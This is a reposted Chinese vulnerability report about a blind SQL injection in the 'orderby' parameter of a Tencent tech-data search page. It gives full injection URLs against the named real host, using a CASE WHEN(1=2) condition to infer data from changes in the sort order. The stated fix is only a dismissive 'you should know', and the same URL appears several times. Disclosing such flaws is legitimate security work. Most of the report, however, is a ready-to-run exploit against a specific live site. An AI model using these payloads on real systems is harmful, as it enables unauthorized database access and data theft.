网站地图    收藏   

主页 > 后端 > 网站安全 >

腾讯某频道某盲注及修复 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 网址:http://cgi.data.tech.qq.com/index.php?classchg=cnt=0curpage=1filterattr=4%7C6filterstype=2%7C2filtervalue=11%7C2000-3000from=1idlist=keyvalue=libid=9mod=searchheaorderby=F19%20des......

网址:
http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4%7C6&filterstype=2%7C2&filtervalue=11%7C2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&orderby=F19%20desc&pagenum=20&site=digi&subcategory=%26%23191%3B%26%23213%3B%26%23181%3B%C2%A1%C3%82&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data
 
注入参数orderby
 
http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
 
 
http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
 
 www.2cto.com
根据when() 中1=1 1=2 返回数据的排序方式进行盲注。
漏洞证明:http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
 
 
http://cgi.data.tech.qq.com/index.php?classchg=&cnt=0&curpage=1&filterattr=4|6&filterstype=2|2&filtervalue=11|2000-3000&from=1&idlist=&keyvalue=&libid=9&mod=searchhea&pagenum=20&site=digi&subcategory=%810%867%810%889%810%858%A1%C2&subcategoryfid=2&subcategoryid=11&tplname=search_result2.shtml&type=data&orderby=F17,%28case%20when%281=2%29%20then%20F17%20else%20F19%20end%29%20desc
 
 
根据when() 中1=1 1=2 返回数据的排序方式进行盲注。
修复方案:
应该懂得!
作者:Jannock

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论